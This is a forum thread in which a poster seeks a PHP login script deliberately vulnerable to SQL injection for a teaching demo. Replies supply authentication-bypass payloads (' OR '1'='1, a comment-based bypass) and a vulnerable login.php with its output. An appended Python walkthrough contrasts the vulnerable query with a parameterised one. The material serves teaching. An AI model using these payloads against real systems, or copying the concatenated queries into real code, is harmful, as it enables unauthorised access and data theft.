
Thread: Make a script vulnerable to SQL injection?

  1. #1 shibbythestoner (Programmer; Scotland; joined Jun 2007; 136 posts; Rep Power 0)

    Hello.

    I find myself in need of a way to show how some things can go wrong with PHP, databases, and the web. I decided there are few better ways than to demonstrate an SQL injection.
    My problem, however, is that the injections don't appear to be working.
    I've made sure that the variables passed through are pure input (employed stripslashes(), didn't use mysql_real_escape_string(), and so on). I've made various attempts at injection, but so far the best result I get is an error about the following line:
    Code:
    if (mysql_num_rows($execute) == NULL){
    Code:
    mysql_num_rows(): supplied argument is not a valid MySQL result resource
    Which is the error appearing on attempted injections.
    Here is some of the code I have been using:
    Code:
    <?php
    // Demo login handler, deliberately left open to SQL injection.
    // The connection details and the POST field names are assumed; the post does not show them.
    $db = mysql_connect('localhost', 'user', 'pass');

    $admin    = isset($_POST['admin'])    ? $_POST['admin']    : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    if (get_magic_quotes_gpc()) {
        // Undo magic_quotes so quote characters reach the query unescaped
        $admin    = stripslashes($admin);
        $password = stripslashes($password);
    }

    if (!$db){
        echo "<font color='#F62817'><b>Error: Could not connect to database - ".mysql_error()."</b></font><p>\n";
        include("admin_loginform.php");
        exit; // die() before the include would skip it, and there is no $db to close
    } //end of if
    else {
        //Leaving $admin and $password open to SQL injection for demonstration purposes
        $query="SELECT *
            FROM admins
            WHERE username='$admin' AND password='$password'";
        $execute=mysql_query($query,$db);
        if ($execute === false) {
            // Injected input that breaks the SQL (e.g. an unbalanced quote) makes mysql_query()
            // return false instead of a result resource; that is the source of the
            // "supplied argument is not a valid MySQL result resource" warning
            die("<font color='#F62817'><b>Query failed: ".mysql_error()."</b></font><p>\n");
        }
        if (mysql_num_rows($execute) == 0){
            echo "<font color='#F62817'><b>Error: Invalid username or password.</b></font><p>\n";
            include("admin_loginform.php");
            mysql_close($db);
        } //end of if
        else {
            echo "<font color='#5EFB6E'><b>Welcome to administration, $admin.</b></font><br>\n";
            echo "What do you want to do?<br>\n";
            // ... admin menu continues here (truncated in the original post)
            mysql_close($db);
        } //end of else
    } //end of else
    ?>
    Can anyone tell me what I could do to make my script vulnerable? For once I want my script to be exploited and I find it doesn't work anyway! I've Googled a bit but I've either not looked in the right places or (oddly enough) there's not much material on how to MAKE a website more vulnerable.

    Summary: I need my script to be exploitable via SQL injection. Any ideas please?

  3. #2 Jordan (Guest)
    Everything looks good and vulnerable here. How are you calling your script? You should call it as:

    http://domain/script.php?admin=OR 1&password=anything

    The OR 1 will cause a clause in the execution of your SQL Query that always equals true.

    Also, I'm not entirely sure that the above statement will actually return any rows. This would cause the mysql_num_rows not to return anything.

    You could try doing:


    http://domain/script.php?admin=admin&password=OR 1

    Which would cause the SQL to return the row with the username of admin.

    Sidewinder should be able to help more once he sees this. He is fairly good with security and PHP.

  4. #3 shibbythestoner
    So you suggest the use of the GET method, as opposed to POST? I'll try that out...perhaps that's what I've been doing wrong all along. You may well be correct about mysql_num_rows() returning nothing, since that's where some problems appear to originate from.
    Well thanks very much, I'll try that out.

    Edit: I'm afraid those suggestions didn't work, the input seems to go through fine but I still get the invalid username/password error. Anything else I could try?
    Last edited by shibbythestoner; 12-15-2007 at 04:35 PM. Reason: fail @ spelling.

  5. #4 shibbythestoner
    Thanks to the "Similar Threads" feature I happened upon, I found the answer in v0id's post on Sidewinder's thread,
    PHP: SQL Injections
    Trying this:
    Code:
    ' OR '1' = '1
    works fine on my script. Thanks, guys!

  6. #5 (joined Jul 2006; Amherst, New York, United States; 6,277 posts; 26 blog entries; Rep Power 20)
    It's really all about how crappily you write your code. When I wrote my tutorial on SQL injections [PHP: SQL Injections], I couldn't for the life of me get a functional demo to work. However, you inspired me to give it another shot, and I managed to get it to work. I'm not really in the mood for explaining it [the tutorial does most of it], so I'll just post my code and you can figure it out yourself.

    Database: injectiontest
    Code:
    CREATE TABLE `users` (
      `id` int(11) NOT NULL auto_increment,
      `username` varchar(200) NOT NULL,
      `password` varchar(200) NOT NULL,
      `creditcard` varchar(200) NOT NULL,
      PRIMARY KEY (`id`)
    );

    INSERT INTO `users` (`id`, `username`, `password`, `creditcard`) VALUES
    (1, 'Sidewinder', 'monkey', '0123456789987654');

    File: login.php
    Code:
    <?php

    // Raw GET input; undo magic_quotes when the server has it on, so quotes reach the query intact
    $username = $_GET['username'];
    $password = $_GET['password'];
    if (get_magic_quotes_gpc()) {
        $username = stripslashes($username);
        $password = stripslashes($password);
    }

    $link = @mysql_connect('localhost', '', '')
        or die('Could not connect: ' . mysql_error());

    mysql_select_db('injectiontest', $link)
        or die('Could not select database.');

    // Deliberately vulnerable: the input is concatenated straight into the SQL
    $query = mysql_query("SELECT * FROM `users` "
            . "WHERE `username` = '$username' "
            . "AND `password` = '$password'");
    $row = mysql_fetch_assoc($query);

    if (mysql_num_rows($query) == 1) {
        echo "Hello {$row['username']}!<br />";
        echo "Your creditcard number is: {$row['creditcard']}";
    }

    ?>
    Then if you point your browser to:
    login.php?username=anything&password=anything'%20OR%201='1
    You will see:
    Hello Sidewinder!
    Your creditcard number is: 0123456789987654
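
The mechanics discussed across this thread, as an added example that is not part of any post above: it rebuilds login.php's query construction in Python against an in-memory SQLite table standing in for the MySQL `injectiontest` database (an assumption; the payloads below behave the same on both, with the one caveat about `--` comments noted in the code), runs post #2's `OR 1` and post #4's `' OR '1' = '1` through it, shows the parse failure that produces the mysql_num_rows() warning from post #1, and puts a parameterised version beside the vulnerable one. The table row is constructed from post #5's INSERT; the `--` payload and the hardened query go beyond what the thread itself shows.

```python
import sqlite3

# Constructed sample data, mirroring the `users` table in post #5.
SAMPLE_USERS = [
    (1, "Sidewinder", "monkey", "0123456789987654"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL `injectiontest` database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, creditcard TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def build_query(username, password):
    """The string login.php builds: raw input dropped between single quotes."""
    return ("SELECT * FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Mirror of login.php's check.

    Returns the matched row when exactly one row comes back, None when no
    row matches, or an 'SQL error: ...' string when the injected input
    leaves the statement unparsable (the case behind the mysql_num_rows()
    warning in post #1: mysql_query() returns false, not a result).
    """
    try:
        rows = conn.execute(build_query(username, password)).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: %s" % exc
    return rows[0] if len(rows) == 1 else None


def login_safe(conn, username, password):
    """Hardened form: a parameterised query, so input is only ever data."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return rows[0] if len(rows) == 1 else None


def demo():
    """Run the thread's payloads against both versions and collect results."""
    conn = make_db()
    results = {}

    # Post #2's idea: "OR 1" lands inside the quotes and is just a literal,
    # so the password simply does not match.
    results["or_1_unquoted"] = login_vulnerable(conn, "admin", "OR 1")

    # Post #4's payload: close the quote, add an always-true clause, and
    # reopen the quote so the trailing ' in the template is balanced.
    # AND binds tighter than OR, so every row satisfies the WHERE clause.
    results["quote_or"] = login_vulnerable(conn, "anything", "' OR '1'='1")

    # An odd number of quotes: the statement cannot be parsed at all.
    results["unbalanced"] = login_vulnerable(conn, "admin' OR 1=1", "x")

    # Beyond the thread: comment out the password check entirely.
    # (SQLite accepts "--" directly; MySQL needs a space after it.)
    results["comment"] = login_vulnerable(conn, "Sidewinder' --", "wrong")

    # The same payload against the parameterised query finds nothing,
    # while real credentials still work.
    results["safe_injected"] = login_safe(conn, "anything", "' OR '1'='1")
    results["safe_valid"] = login_safe(conn, "Sidewinder", "monkey")
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print("%-16s %r" % (name, outcome))
```

Running it prints one line per payload; the `quote_or` and `comment` entries come back with Sidewinder's row, `or_1_unquoted` and both `safe_*` injected cases come back empty, and `unbalanced` carries the parser's error text, which is the SQLite equivalent of the warning the first post was seeing.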

  7. #6 shibbythestoner
    Cool script Sidewinder!
    Also, thanks for your credit card number.

  8. #7 Jordan (Guest)
    Nice work Sidewinder!

  9. #8 (same member as #5)
    It feels weird being complimented for providing a script with poor standards, horrible security measures, and completely senseless code - but thanks.
